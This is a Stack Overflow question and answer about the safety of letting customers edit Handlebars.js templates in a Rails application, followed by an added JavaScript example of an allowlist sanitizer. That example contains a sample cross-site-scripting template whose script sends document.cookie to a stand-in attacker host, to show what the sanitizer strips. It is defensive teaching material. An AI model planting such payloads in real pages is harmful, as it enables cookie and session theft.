How safe is it to allow customers to edit Handlebars.js templates?

萝らか妹 submitted on 2019-12-11 04:49:37

Question


The Rails application that I am building needs to allow users to edit the page template.

The main concern is how safe it is to allow customers to edit the templates. That puts ERB templates out of the equation.

I have looked at Liquid markup and Handlebars.js. There is a nice Rails integration for Handlebars here: https://github.com/jamesarosen/handlebars-rails .

I would prefer to use Handlebars. Can somebody confirm whether it is safe to let customers edit Handlebars templates?


Answer 1:


Since Handlebars.js doesn't contain any Ruby code that needs to be evaled: yes, it's safe on the server side.

Since Handlebars.js (like any other templating engine) allows the user to change the HTML markup (insert <script>, <iframe>): no, it's not safe on the client side (unless you have some additional sanitizing).
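
The following script is an added example illustrating the client-side half of that answer; it is not part of the original question or answer and not code from the handlebars-rails project. `renderTemplate` is a minimal stand-in for `Handlebars.compile(tpl)(context)` that mirrors only two rules of the real engine: `{{name}}` is HTML-escaped and `{{{name}}}` is emitted raw, while everything outside the mustaches is copied verbatim. That verbatim copy is the whole problem: escaping protects the data, not the template body, so a customer who edits the template can put a `<script>` or a `javascript:` link straight into the page. `sanitizeHtml` is an allowlist sanitizer written for this example (tag and attribute names, the `attacker.example` URL and the sample template are all constructed) and is applied to the rendered output, which is the "additional sanitizing" the answer calls for.

```javascript
// Added example (not from the original question/answer or from handlebars-rails).
// It shows the client-side point of the answer: a template editor hands the
// customer control of the page's HTML, so engine-level escaping of {{values}}
// does not help, and the rendered output has to be sanitized.

// Handlebars' HTML escaping covers these characters; mirrored here.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;",
                "'": "&#x27;", "`": "&#x60;", "=": "&#x3D;" };
  return String(s).replace(/[&<>"'`=]/g, (c) => map[c]);
}

// Minimal stand-in for Handlebars.compile(tpl)(context), supporting only
// {{name}} (escaped) and {{{name}}} (raw). Text outside the mustaches is
// copied verbatim, which is exactly why the template author controls markup.
// Only own properties of the context are resolved, so a template cannot
// reach prototype members through a bare name.
function renderTemplate(tpl, context) {
  const lookup = (name) =>
    Object.prototype.hasOwnProperty.call(context, name) ? String(context[name]) : "";
  return tpl.replace(/\{\{\{\s*(\w+)\s*\}\}\}|\{\{\s*(\w+)\s*\}\}/g,
    (_m, raw, esc) => (raw !== undefined ? lookup(raw) : escapeHtml(lookup(esc))));
}

// Allowlist sanitizer for the *rendered* HTML: tag -> permitted attributes.
const ALLOWED = new Map([
  ["p", []], ["br", []], ["b", []], ["i", []], ["em", []], ["strong", []],
  ["h1", []], ["h2", []], ["h3", []], ["ul", []], ["ol", []], ["li", []],
  ["a", ["href", "title"]], ["img", ["src", "alt"]],
]);
// Elements whose content is dropped as well, not just the tag itself.
const DROP_WITH_CONTENT = new Set(["script", "style", "iframe", "object"]);
const SAFE_URL = /^(https?:|mailto:|\/(?!\/))/i;  // blocks javascript:, data:, //host

function filterAttributes(tag, rawAttrs) {
  const permitted = ALLOWED.get(tag);
  const attr = /([a-zA-Z_:][-\w:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let kept = "", m;
  while ((m = attr.exec(rawAttrs)) !== null) {
    const key = m[1].toLowerCase();
    if (!permitted.includes(key)) continue;          // drops onclick=, style=, ...
    const value = (m[2] ?? m[3] ?? m[4] ?? "").trim();
    if ((key === "href" || key === "src") && !SAFE_URL.test(value)) continue;
    kept += ` ${key}="${escapeHtml(value)}"`;
  }
  return kept;
}

function sanitizeHtml(html) {
  const token = /<!--[\s\S]*?-->|<\/?([a-zA-Z][a-zA-Z0-9-]*)([^<>]*)>|[^<]+|</g;
  let out = "", skipUntil = null, m;
  while ((m = token.exec(html)) !== null) {
    const text = m[0];
    const tag = m[1] ? m[1].toLowerCase() : null;
    const closing = text.startsWith("</");
    if (skipUntil) {                                 // inside <script>...</script> etc.
      if (tag === skipUntil && closing) skipUntil = null;
      continue;
    }
    if (tag === null) {                              // comment, text, or a stray "<"
      if (!text.startsWith("<!--")) out += text === "<" ? "&lt;" : text;
      continue;
    }
    if (DROP_WITH_CONTENT.has(tag)) { if (!closing) skipUntil = tag; continue; }
    if (!ALLOWED.has(tag)) continue;                 // unknown tag: drop tag, keep content
    out += closing ? `</${tag}>` : `<${tag}${filterAttributes(tag, m[2])}>`;
  }
  return out;
}

// Constructed sample of what a customer could save through the template editor.
const CUSTOMER_TEMPLATE =
  "<h1>Hello {{name}}</h1>" +
  '<script>location="https://attacker.example/?c="+document.cookie</script>' +
  '<a href="javascript:alert(1)" onclick="steal()">profile</a>';

// The data value is escaped, but the script and the javascript: link pass through.
function renderUnsafe() {
  return renderTemplate(CUSTOMER_TEMPLATE, { name: "<b>Ada</b>" });
}
// Sanitizing the rendered output, not the data, is what removes them.
function renderSafe() {
  return sanitizeHtml(renderUnsafe());
}

console.log(renderUnsafe());
console.log(renderSafe());
```

Two things to take from running it: `renderSafe()` keeps the heading and the link text but drops the `<script>` block, the `javascript:` href and the `onclick` handler, and `renderTemplate("<p>{{{html}}}</p>", ...)` shows that a template author can always opt out of escaping with triple mustaches, so sanitizing the data alone is never enough. In a Rails application the sanitizing step would normally be the `sanitize` view helper (rails-html-sanitizer) or a maintained client-side sanitizer rather than the hand-rolled allowlist above, and the decision of which tags and attributes customers may use is the one that actually determines how much risk a template editor introduces.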



Source: https://stackoverflow.com/questions/9946416/how-safe-is-to-allow-customer-edit-handlebar-js-template
